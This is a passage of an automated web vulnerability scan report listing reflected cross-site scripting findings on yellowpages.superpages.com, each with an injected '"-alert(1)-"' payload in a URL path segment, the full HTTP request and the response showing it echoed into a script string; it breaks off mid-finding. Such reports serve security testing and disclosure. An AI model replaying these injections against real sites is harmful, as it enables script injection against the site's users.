4.617. http://yellowpages.superpages.com/common/js/omniture_onclick.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/omniture_onclick.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df457"-alert(1)-"a7b7f4d7dfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/omniture_onclick.jsdf457&quot;-alert(1)-&quot;a7b7f4d7dfe
Server: Unspecified
Set-Cookie: JSESSIONID=9498FB0873E17746361EF5E2C5BDC544; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:45 GMT
Cache-Control: private
Content-Length: 36097


                       <!--
       
       -->


                                   
...[SNIP]...
es.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.618. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db562"-alert(1)-"02c46e9b05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commondb562&quot;-alert(1)-&quot;02c46e9b05d/js/recently_viewed.js
Server: Unspecified
Set-Cookie: JSESSIONID=03649920B5E5DB0BFD83D266F18EA9E6; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:05 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.619. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 442ba"-alert(1)-"a80008c80c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js442ba&quot;-alert(1)-&quot;a80008c80c5/recently_viewed.js
Server: Unspecified
Set-Cookie: JSESSIONID=E2823CB965F982388D18954E8635CB0A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:12 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.620. http://yellowpages.superpages.com/common/js/recently_viewed.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/recently_viewed.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 470ae"-alert(1)-"830ee1c48fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/recently_viewed.js470ae&quot;-alert(1)-&quot;830ee1c48fb
Server: Unspecified
Set-Cookie: JSESSIONID=4D351DFDC8EF4B40214A7E149528CB6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:20 GMT
Cache-Control: private
Content-Length: 36095


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.621. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539eb"-alert(1)-"4cc78ad7314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common539eb"-alert(1)-"4cc78ad7314/js/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common539eb&quot;-alert(1)-&quot;4cc78ad7314/js/s_code.js
Server: Unspecified
Set-Cookie: JSESSIONID=DDC3DFA0E0BB8639F6F4C62A95C26747; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:36 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common539eb"-alert(1)-"4cc78ad7314/js/s_code.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.622. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb37a"-alert(1)-"32622685d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsbb37a"-alert(1)-"32622685d4e/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsbb37a&quot;-alert(1)-&quot;32622685d4e/s_code.js
Server: Unspecified
Set-Cookie: JSESSIONID=20AEC5B794C7F22300B4AB7C1BE8B541; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsbb37a"-alert(1)-"32622685d4e/s_code.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.623. http://yellowpages.superpages.com/common/js/s_code.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/s_code.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e5"-alert(1)-"7e6c3fe42b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/s_code.jsb38e5&quot;-alert(1)-&quot;7e6c3fe42b7
Server: Unspecified
Set-Cookie: JSESSIONID=7C8652CC4A96C376FF779F3B2EFDF4DA; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:53 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
/yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.624. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf9"-alert(1)-"8dab2c2c71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common77bf9&quot;-alert(1)-&quot;8dab2c2c71d/js/sendtom.js
Server: Unspecified
Set-Cookie: JSESSIONID=983DC2F2B845AB07443C74AFEC6EC3C9; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:31 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.625. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0"-alert(1)-"aaabf2e973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js1f6a0&quot;-alert(1)-&quot;aaabf2e973b/sendtom.js
Server: Unspecified
Set-Cookie: JSESSIONID=6CD48A2FE82530486D8D85DC245C52C4; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:38 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.626. http://yellowpages.superpages.com/common/js/sendtom.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/sendtom.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eabbc"-alert(1)-"b304378f63d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/sendtom.jseabbc"-alert(1)-"b304378f63d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/sendtom.jseabbc&quot;-alert(1)-&quot;b304378f63d
Server: Unspecified
Set-Cookie: JSESSIONID=74A77B104A3B996CCA486703E507CA88; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:45 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/sendtom.jseabbc"-alert(1)-"b304378f63d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.627. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4461d"-alert(1)-"6930c85dd26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common4461d&quot;-alert(1)-&quot;6930c85dd26/js/spflyouts.1.0.js
Server: Unspecified
Set-Cookie: JSESSIONID=F173D17509F7FCAEF102A94A23B8CBF8; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.628. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91df3"-alert(1)-"e8a95c1c0a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js91df3&quot;-alert(1)-&quot;e8a95c1c0a9/spflyouts.1.0.js
Server: Unspecified
Set-Cookie: JSESSIONID=F03C23C51384E7387839BE0403233F2F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:08 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.629. http://yellowpages.superpages.com/common/js/spflyouts.1.0.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/spflyouts.1.0.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc0a"-alert(1)-"689c16f939c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/spflyouts.1.0.js2cc0a&quot;-alert(1)-&quot;689c16f939c
Server: Unspecified
Set-Cookie: JSESSIONID=6AC921D19E8E658E299A352472A367AB; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:22 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.630. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ab9"-alert(1)-"d45a7fa5aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common98ab9&quot;-alert(1)-&quot;d45a7fa5aaf/js/swfobject.js
Server: Unspecified
Set-Cookie: JSESSIONID=36DFAAE7A032362EAD1EE07FE700AD0E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:27 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.631. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df462"-alert(1)-"539d2934731 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

